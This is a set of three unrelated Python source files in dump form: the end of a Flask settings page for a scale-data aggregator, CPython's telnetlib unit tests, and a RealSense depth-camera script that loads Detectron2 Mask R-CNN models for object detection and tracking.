currentAggregatorLoopsOfPersists = CfgRW.cfgVars["aggregatorLoopsOfPersists"]
currentAggregatorPrintPushes = CfgRW.cfgVars["aggregatorPrintPushes"]
currentDBHostServer = CfgRW.cfgVars["dbHostServer"]
currentDBHostPort = CfgRW.cfgVars["dbHostPort"]
currentDBName = CfgRW.cfgVars["dbName"]
currentDBCollectionName = CfgRW.cfgVars["dbCollectionName"]
if 'failMsg' not in session:
didFail = "False"
failMsg = "None"
else:
didFail = "True"
failMsg = session.pop('failMsg', None)
return render_template("ChangeSettingPage.html", totalNum=totalNum, currentDBToUse=currentDBToUse, currentSimulateData=currentSimulateData, currentUseCQuickPulse=currentUseCQuickPulse,
currentUseMedianOfData=currentUseMedianOfData, currentAggregatorSecsPerPersist=currentAggregatorSecsPerPersist, currentAggregatorLoopsOfPersists=currentAggregatorLoopsOfPersists,
currentAggregatorPrintPushes=currentAggregatorPrintPushes, currentDBHostServer=currentDBHostServer, currentDBHostPort=currentDBHostPort, currentDBName=currentDBName,
currentDBCollectionName=currentDBCollectionName, num=ScaleIRW.GetNumOfScales(), didFail=didFail, failMsg=failMsg, currentLaunchScaleAggregatorOnStart=currentLaunchScaleAggregatorOnStart,
currentLoadSamplesPerRead=currentLoadSamplesPerRead, currentUselatestFromMongoAsCurrent=currentUselatestFromMongoAsCurrent)
elif request.method == 'POST':
try:
int(request.form['aggregatorSecsPerPersist'])
int(request.form['aggregatorLoopsOfPersists'])
int(request.form['loadSamplesPerRead'])
int(request.form['dbHostPort'])
except:
session['failMsg'] = "An error occurred while processing your input."
return redirect(url_for('changeSettings'))
CfgRW.cfgVars["dbToUse"] = request.form['dbToUse']
CfgRW.cfgVars["simulateData"] = request.form['simulateData']
CfgRW.cfgVars["useCQuickPulse"] = request.form['useCQuickPulse']
CfgRW.cfgVars["useMedianOfData"] = request.form['useMedianOfData']
CfgRW.cfgVars["uselatestFromMongoAsCurrent"] = request.form['uselatestFromMongoAsCurrent']
CfgRW.cfgVars["loadSamplesPerRead"] = request.form['loadSamplesPerRead']
CfgRW.cfgVars["launchScaleAggregatorOnStart"] = request.form['launchScaleAggregatorOnStart']
CfgRW.cfgVars["aggregatorSecsPerPersist"] = request.form['aggregatorSecsPerPersist']
CfgRW.cfgVars["aggregatorLoopsOfPersists"] = request.form['aggregatorLoopsOfPersists']
CfgRW.cfgVars["aggregatorPrintPushes"] = request.form['aggregatorPrintPushes']
CfgRW.cfgVars["dbHostServer"] = request.form['dbHostServer']
CfgRW.cfgVars["dbHostPort"] = request.form['dbHostPort']
CfgRW.cfgVars["dbName"] = request.form['dbName']
CfgRW.cfgVars["dbCollectionName"] = request.form['dbCollectionName']
CfgRW.CreateNewCFGFile()
if request.form["submit"] == "Set and Restart":
os.system('sudo reboot')
return redirect(url_for('home'))
def LogFilePath():
return logDir + "/" + logFile
def DeleteLogFile():
os.remove(LogFilePath())
def closeLoggerHandlers():
for handler in app.logger.handlers:
handler.close()
app.logger.removeHandler(handler)
def createHandler():
file_handler = logging.FileHandler(LogFilePath())
file_handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(levelname)s\t%(asctime)s \t%(message)s')
file_handler.setFormatter(formatter)
return file_handler
if __name__ == "__main__":
if CfgRW.cfgVars["launchScaleAggregatorOnStart"].upper() == "TRUE":
os.system("(cd ../ScaleAggregator/; python ScaleAggregator.py &)")
if not app.debug:
if not os.path.exists(logDir):
os.makedirs(logDir)
file_handler = createHandler()
app.logger.setLevel(logging.DEBUG)
app.logger.addHandler(file_handler)
app.run(threaded=True, host='0.0.0.0')
|
test_telnetlib.py | import socket
import select
import telnetlib
import time
import contextlib
import unittest
from unittest import TestCase
from test import support
threading = support.import_module('threading')
HOST = support.HOST
def server(evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except socket.timeout:
pass
finally:
serv.close()
class GeneralTests(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = support.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
# None, having other default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=()):
self.reads = list(reads) # Intentionally make a copy.
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
def mock_select(*s_args):
block = False
for l in s_args:
for fob in l:
if isinstance(fob, TelnetAlike):
block = fob.sock.block
if block:
return [[], [], []]
else:
return s_args
class MockPoller(object):
test_case = None # Set during TestCase setUp.
def __init__(self):
self._file_objs = []
def register(self, fd, eventmask):
self.test_case.assertTrue(hasattr(fd, 'fileno'), fd)
self.test_case.assertEqual(eventmask, select.POLLIN|select.POLLPRI)
self._file_objs.append(fd)
def poll(self, timeout=None):
block = False
for fob in self._file_objs:
if isinstance(fob, TelnetAlike):
block = fob.sock.block
if block:
return []
else:
return zip(self._file_objs, [select.POLLIN]*len(self._file_objs))
def unregister(self, fd):
self._file_objs.remove(fd)
@contextlib.contextmanager
def test_socket(reads):
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=(), cls=TelnetAlike, use_poll=None):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
if use_poll is not None:
if use_poll and not telnet._has_poll:
raise unittest.SkipTest('select.poll() required.')
telnet._has_poll = use_poll
return telnet
class ExpectAndReadTestCase(TestCase):
def setUp(self):
self.old_select = select.select
select.select = mock_select
self.old_poll = False
if hasattr(select, 'poll'):
self.old_poll = select.poll
select.poll = MockPoller
MockPoller.test_case = self
def tearDown(self):
if self.old_poll:
MockPoller.test_case = None
select.poll = self.old_poll
select.select = self.old_select
class ReadTests(ExpectAndReadTestCase):
def test_read_until(self):
"""
read_until(expected, timeout=None)
test the blocking version of read_util
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_until_with_poll(self):
"""Use select.poll() to implement telnet.read_until()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=True)
select.select = lambda *_: self.fail('unexpected select() call.')
data = telnet.read_until(b'match')
self.assertEqual(data, b''.join(want[:-1]))
def test_read_until_with_select(self):
"""Use select.select() to implement telnet.read_until()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=False)
if self.old_poll:
select.poll = lambda *_: self.fail('unexpected poll() call.')
data = telnet.read_until(b'match')
self.assertEqual(data, b''.join(want[:-1]))
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
# read_eager and read_very_eager make the same gaurantees
# (they behave differently but we only test the gaurantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
def read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(TestCase):
'''The only thing that write does is replace each tl.IAC for
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
def test_expect(self):
"""
expect(expected, [timeout])
Read until the expected string has been seen, or a timeout is
hit (default is no timeout); may block.
"""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want)
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
def test_expect_with_poll(self):
"""Use select.poll() to implement telnet.expect()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=True)
select.select = lambda *_: self.fail('unexpected select() call.')
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
def test_expect_with_select(self):
"""Use select.select() to implement telnet.expect()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=False)
if self.old_poll:
select.poll = lambda *_: self.fail('unexpected poll() call.')
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
def test_main(verbose=None):
support.run_unittest(GeneralTests, ReadTests, WriteTests, OptionTests,
ExpectTests)
if __name__ == '__main__':
test_main()
|
realsense.py | import numpy as np
import time
import cv2
import pyrealsense2 as rs
import random
import math
import argparse
from threading import Thread
from matplotlib import pyplot as plt
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from mpl_toolkits.mplot3d import proj3d
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.patches import FancyArrowPatch
from detectron2.engine import DefaultPredictor
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.utils.visualizer import GenericMask
from detectron2.utils.visualizer import ColorMode
from detectron2.structures import Boxes, RotatedBoxes
from detectron2.data import MetadataCatalog
import torch, torchvision
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import os
import pkg_resources
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.modeling import build_model
# >>---------------------- load predefined model -------------------
class _ModelZooUrls(object):
"""
Mapping from names to officially released Detectron2 pre-trained models.
"""
S3_PREFIX = "https://dl.fbaipublicfiles.com/detectron2/"
# format: {config_path.yaml} -> model_id/model_final_{commit}.pkl
CONFIG_PATH_TO_URL_SUFFIX = {
# COCO Detection with Faster R-CNN
"COCO-Detection/faster_rcnn_R_50_C4_1x.yaml": "137257644/model_final_721ade.pkl",
"COCO-Detection/faster_rcnn_R_50_DC5_1x.yaml": "137847829/model_final_51d356.pkl",
"COCO-Detection/faster_rcnn_R_50_FPN_1x.yaml": "137257794/model_final_b275ba.pkl",
"COCO-Detection/faster_rcnn_R_50_C4_3x.yaml": "137849393/model_final_f97cb7.pkl",
"COCO-Detection/faster_rcnn_R_50_DC5_3x.yaml": "137849425/model_final_68d202.pkl",
"COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml": "137849458/model_final_280758.pkl",
"COCO-Detection/faster_rcnn_R_101_C4_3x.yaml": "138204752/model_final_298dad.pkl",
"COCO-Detection/faster_rcnn_R_101_DC5_3x.yaml": "138204841/model_final_3e0943.pkl",
"COCO-Detection/faster_rcnn_R_101_FPN_3x.yaml": "137851257/model_final_f6e8b1.pkl",
"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml": "139173657/model_final_68b088.pkl",
# COCO Detection with RetinaNet
"COCO-Detection/retinanet_R_50_FPN_1x.yaml": "190397773/model_final_bfca0b.pkl",
"COCO-Detection/retinanet_R_50_FPN_3x.yaml": "190397829/model_final_5bd44e.pkl",
"COCO-Detection/retinanet_R_101_FPN_3x.yaml": "190397697/model_final_971ab9.pkl",
# COCO Detection with RPN and Fast R-CNN
"COCO-Detection/rpn_R_50_C4_1x.yaml": "137258005/model_final_450694.pkl",
"COCO-Detection/rpn_R_50_FPN_1x.yaml": "137258492/model_final_02ce48.pkl",
"COCO-Detection/fast_rcnn_R_50_FPN_1x.yaml": "137635226/model_final_e5f7ce.pkl",
# COCO Instance Segmentation Baselines with Mask R-CNN
"COCO-InstanceSegmentation/mask_rcnn_R_50_C4_1x.yaml": "137259246/model_final_9243eb.pkl",
"COCO-InstanceSegmentation/mask_rcnn_R_50_DC5_1x.yaml": "137260150/model_final_4f86c3.pkl",
"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml": "137260431/model_final_a54504.pkl",
"COCO-InstanceSegmentation/mask_rcnn_R_50_C4_3x.yaml": "137849525/model_final_4ce675.pkl",
"COCO-InstanceSegmentation/mask_rcnn_R_50_DC5_3x.yaml": "137849551/model_final_84107b.pkl",
"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml": "137849600/model_final_f10217.pkl",
"COCO-InstanceSegmentation/mask_rcnn_R_101_C4_3x.yaml": "138363239/model_final_a2914c.pkl",
"COCO-InstanceSegmentation/mask_rcnn_R_101_DC5_3x.yaml": "138363294/model_final_0464b7.pkl",
"COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml": "138205316/model_final_a3ec72.pkl",
"COCO-InstanceSegmentation/mask_rcnn_X_101_32x8d_FPN_3x.yaml": "139653917/model_final_2d9806.pkl", # noqa
# COCO Person Keypoint Detection Baselines with Keypoint R-CNN
"COCO-Keypoints/keypoint_rcnn_R_50_FPN_1x.yaml": "137261548/model_final_04e291.pkl",
"COCO-Keypoints/keypoint_rcnn_R_50_FPN_3x.yaml": "137849621/model_final_a6e10b.pkl",
"COCO-Keypoints/keypoint_rcnn_R_101_FPN_3x.yaml": "138363331/model_final_997cc7.pkl",
"COCO-Keypoints/keypoint_rcnn_X_101_32x8d_FPN_3x.yaml": "139686956/model_final_5ad38f.pkl",
# COCO Panoptic Segmentation Baselines with Panoptic FPN
"COCO-PanopticSegmentation/panoptic_fpn_R_50_1x.yaml": "139514544/model_final_dbfeb4.pkl",
"COCO-PanopticSegmentation/panoptic_fpn_R_50_3x.yaml": "139514569/model_final_c10459.pkl",
"COCO-PanopticSegmentation/panoptic_fpn_R_101_3x.yaml": "139514519/model_final_cafdb1.pkl",
# LVIS Instance Segmentation Baselines with Mask R-CNN
"LVIS-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml": "144219072/model_final_571f7c.pkl",
"LVIS-InstanceSegmentation/mask_rcnn_R_101_FPN_1x.yaml": "144219035/model_final_824ab5.pkl",
"LVIS-InstanceSegmentation/mask_rcnn_X_101_32x8d_FPN_1x.yaml": "144219108/model_final_5e3439.pkl", # noqa
# Cityscapes & Pascal VOC Baselines
"Cityscapes/mask_rcnn_R_50_FPN.yaml": "142423278/model_final_af9cf5.pkl",
"PascalVOC-Detection/faster_rcnn_R_50_C4.yaml": "142202221/model_final_b1acc2.pkl",
# Other Settings
"Misc/mask_rcnn_R_50_FPN_1x_dconv_c3-c5.yaml": "138602867/model_final_65c703.pkl",
"Misc/mask_rcnn_R_50_FPN_3x_dconv_c3-c5.yaml": "144998336/model_final_821d0b.pkl",
"Misc/cascade_mask_rcnn_R_50_FPN_1x.yaml": "138602847/model_final_e9d89b.pkl",
"Misc/cascade_mask_rcnn_R_50_FPN_3x.yaml": "144998488/model_final_480dd8.pkl",
"Misc/mask_rcnn_R_50_FPN_3x_syncbn.yaml": "169527823/model_final_3b3c51.pkl",
"Misc/mask_rcnn_R_50_FPN_3x_gn.yaml": "138602888/model_final_dc5d9e.pkl",
"Misc/scratch_mask_rcnn_R_50_FPN_3x_gn.yaml": "138602908/model_final_01ca85.pkl",
"Misc/panoptic_fpn_R_101_dconv_cascade_gn_3x.yaml": "139797668/model_final_be35db.pkl",
"Misc/cascade_mask_rcnn_X_152_32x8d_FPN_IN5k_gn_dconv.yaml": "18131413/model_0039999_e76410.pkl", # noqa
# D1 Comparisons
"Detectron1-Comparisons/faster_rcnn_R_50_FPN_noaug_1x.yaml": "137781054/model_final_7ab50c.pkl", # noqa
"Detectron1-Comparisons/mask_rcnn_R_50_FPN_noaug_1x.yaml": "137781281/model_final_62ca52.pkl", # noqa
"Detectron1-Comparisons/keypoint_rcnn_R_50_FPN_1x.yaml": "137781195/model_final_cce136.pkl",
}
def get_checkpoint_url(config_path):
"""
Returns the URL to the model trained using the given config
Args:
config_path (str): config file name relative to detectron2's "configs/"
directory, e.g., "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml"
Returns:
str: a URL to the model
"""
name = config_path.replace(".yaml", "")
if config_path in _ModelZooUrls.CONFIG_PATH_TO_URL_SUFFIX:
suffix = _ModelZooUrls.CONFIG_PATH_TO_URL_SUFFIX[config_path]
return _ModelZooUrls.S3_PREFIX + name + "/" + suffix
raise RuntimeError("{} not available in Model Zoo!".format(name))
def get_config_file(config_path):
"""
Returns path to a builtin config file.
Args:
config_path (str): config file name relative to detectron2's "configs/"
directory, e.g., "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml"
Returns:
str: the real path to the config file.
"""
cfg_file = pkg_resources.resource_filename(
"detectron2.model_zoo", os.path.join("configs", config_path)
)
if not os.path.exists(cfg_file):
raise RuntimeError("{} not available in Model Zoo!".format(config_path))
return cfg_file
def get(config_path, trained: bool = False):
"""
Get a model specified by relative path under Detectron2's official ``configs/`` directory.
Args:
config_path (str): config file name relative to detectron2's "configs/"
directory, e.g., "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml"
trained (bool): If True, will initialize the model with the trained model zoo weights.
If False, the checkpoint specified in the config file's ``MODEL.WEIGHTS`` is used
instead; this will typically (though not always) initialize a subset of weights using
an ImageNet pre-trained model, while randomly initializing the other weights.
Returns:
nn.Module: a detectron2 model
Example:
::
from detectron2 import model_zoo
model = model_zoo.get("COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml", trained=True)
"""
cfg_file = get_config_file(config_path)
cfg = get_cfg()
cfg.merge_from_file(cfg_file)
if trained:
cfg.MODEL.WEIGHTS = get_checkpoint_url(config_path)
if not torch.cuda.is_available():
cfg.MODEL.DEVICE = "cpu"
model = build_model(cfg)
DetectionCheckpointer(model).load(cfg.MODEL.WEIGHTS)
return model
# E.g. # model = model_zoo.get("COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml", trained=True)
# <<---------------------- load predefined model -------------------
# Resolution of camera streams
RESOLUTION_X = 640 # 640, 1280
RESOLUTION_Y = 360 # 480, 720
# Configuration for histogram for depth image
NUM_BINS = 500 # 500 x depth_scale = e.g. 500x0.001m=50cm
MAX_RANGE = 10000 # 10000xdepth_scale = e.g. 10000x0.001m=10m
AXES_SIZE = 10
class VideoStreamer:
"""
Video streamer that takes advantage of multi-threading, and continuously is reading frames.
Frames are then ready to read when program requires.
"""
def __init__(self, video_file=None):
"""
When initialised, VideoStreamer object should be reading frames
"""
self.setup_image_config(video_file)
self.configure_streams()
self.stopped = False
def start(self):
"""
Initialise thread, update method will run under thread
"""
Thread(target=self.update, args=()).start()
return self
def update(self):
"""
Constantly read frames until stop() method is introduced
"""
while True:
if self.stopped:
return
frames = self.pipeline.wait_for_frames()
frames = self.align.process(frames)
color_frame = frames.get_color_frame()
depth_frame = frames.get_depth_frame()
self.depth_intrin = depth_frame.profile.as_video_stream_profile().intrinsics
# Convert image to numpy array and initialise images
self.color_image = np.asanyarray(color_frame.get_data())
self.depth_image = np.asanyarray(depth_frame.get_data())
def stop(self):
self.pipeline.stop()
self.stopped = True
def read(self):
return (self.color_image, self.depth_image)
def setup_image_config(self, video_file=None):
"""
Setup config and video steams. If --file is specified as an argument, setup
stream from file. The input of --file is a .bag file in the bag_files folder.
.bag files can be created using d435_to_file in the tools folder.
video_file is by default None, and thus will by default stream from the
device connected to the USB.
"""
config = rs.config()
if video_file is None:
config.enable_stream(rs.stream.depth, RESOLUTION_X, RESOLUTION_Y, rs.format.z16, 30)
config.enable_stream(rs.stream.color, RESOLUTION_X, RESOLUTION_Y, rs.format.bgr8, 30)
else:
try:
config.enable_device_from_file("bag_files/{}".format(video_file))
except:
print("Cannot enable device from: '{}'".format(video_file))
self.config = config
def configure_streams(self):
# Configure video streams
self.pipeline = rs.pipeline()
# Start streaming
self.profile = self.pipeline.start(self.config)
self.align = rs.align(rs.stream.color)
def get_depth_scale(self):
return self.profile.get_device().first_depth_sensor().get_depth_scale()
class Predictor(DefaultPredictor):
def __init__(self):
self.config = self.setup_predictor_config()
super().__init__(self.config)
def create_outputs(self, color_image):
self.outputs = self(color_image)
def setup_predictor_config(self):
"""
Setup config and return predictor. See config/defaults.py for more options
"""
config_path = 'COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml'
print(f'vip-Using {config_path} at /Users/bowu/opt/anaconda3/lib/python3.7/site-packages/detectron2/engine/defaults.py')
# cfg_file = get_config_file(config_path)
cfg = get_cfg()
cfg.merge_from_file("configs/COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml")
pretrained = True
if pretrained:
cfg.MODEL.WEIGHTS = get_checkpoint_url(config_path)
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.4
# Mask R-CNN ResNet101 FPN weights
# cfg.MODEL.WEIGHTS = "model_final_a3ec72.pkl"
# This determines the resizing of the image. At 0, resizing is disabled.
cfg.INPUT.MIN_SIZE_TEST = 0
return cfg
def format_results(self, class_names):
"""
Format results so they can be used by overlay_instances function
"""
predictions = self.outputs['instances']
boxes = predictions.pred_boxes if predictions.has("pred_boxes") else None
scores = predictions.scores if predictions.has("scores") else None
classes = predictions.pred_classes if predictions.has("pred_classes") else None
labels = None
if classes is not None and class_names is not None and len(class_names) > 1:
labels = [class_names[i] for i in classes]
if scores is not None:
if labels is None:
labels = ["{:.0f}%".format(s * 100) for s in scores]
else:
labels = ["{} {:.0f}%".format(l, s * 100) for l, s in zip(labels, scores)]
masks = predictions.pred_masks.cpu().numpy()
masks = [GenericMask(x, v.output.height, v.output.width) for x in masks]
boxes_list = boxes.tensor.tolist()
scores_list = scores.tolist()
class_list = classes.tolist()
for i in range(len(scores_list)):
boxes_list[i].append(scores_list[i])
boxes_list[i].append(class_list[i])
boxes_list = np.array(boxes_list)
return (masks, boxes, boxes_list, labels, scores_list, class_list)
class OptimizedVisualizer(Visualizer):
"""
Detectron2's altered Visualizer class which converts boxes tensor to cpu
"""
def __init__(self, img_rgb, metadata, scale=1.0, instance_mode=ColorMode.IMAGE):
super().__init__(img_rgb, metadata, scale, instance_mode)
def _convert_boxes(self, boxes):
"""
Convert different format of boxes to an NxB array, where B = 4 or 5 is the box dimension.
"""
if isinstance(boxes, Boxes) or isinstance(boxes, RotatedBoxes):
return boxes.tensor.cpu().numpy()
else:
return np.asarray(boxes)
class DetectedObject:
"""
Each object corresponds to all objects detected during the instance segmentation
phase. Associated trackers, distance, position and velocity are stored as attributes
of the object.
masks[i], boxes[i], labels[i], scores_list[i], class_list[i]
"""
def __init__(self, mask, box, label, score, class_name):
self.mask = mask
self.box = box
self.label = label
self.score = score
self.class_name = class_name
def __str__(self):
ret_str = "The pixel mask of {} represents a {} and is {}m away from the camera.\n".format(self.mask,
self.class_name,
self.distance)
if hasattr(self, 'track'):
if hasattr(self.track, 'speed'):
if self.track.speed >= 0:
ret_str += "The {} is travelling {}m/s towards the camera\n".format(self.class_name,
self.track.speed)
else:
ret_str += "The {} is travelling {}m/s away from the camera\n".format(self.class_name,
abs(self.track.speed))
if hasattr(self.track, 'impact_time'):
ret_str += "The {} will collide in {} seconds\n".format(self.class_name, self.track.impact_time)
if hasattr(self.track, 'velocity'):
ret_str += "The {} is located at {} and travelling at {}m/s\n".format(self.class_name,
self.track.position,
self.track.velocity)
return ret_str
def create_vector_arrow(self):
"""
Creates direction arrow which will use Arrow3D object. Converts vector to a suitable size so that the direction is clear.
NOTE: The magnitude of the velocity is not represented through this arrow. The arrow lengths are almost all identical
"""
arrow_ratio = AXES_SIZE / max(abs(self.track.velocity_vector[0]), abs(self.track.velocity_vector[1]),
abs(self.track.velocity_vector[2]))
self.track.v_points = [x * arrow_ratio for x in self.track.velocity_vector]
class Arrow3D(FancyArrowPatch):
"""
Arrow used to demonstrate direction of travel for each object
"""
def __init__(self, xs, ys, zs, *args, **kwargs):
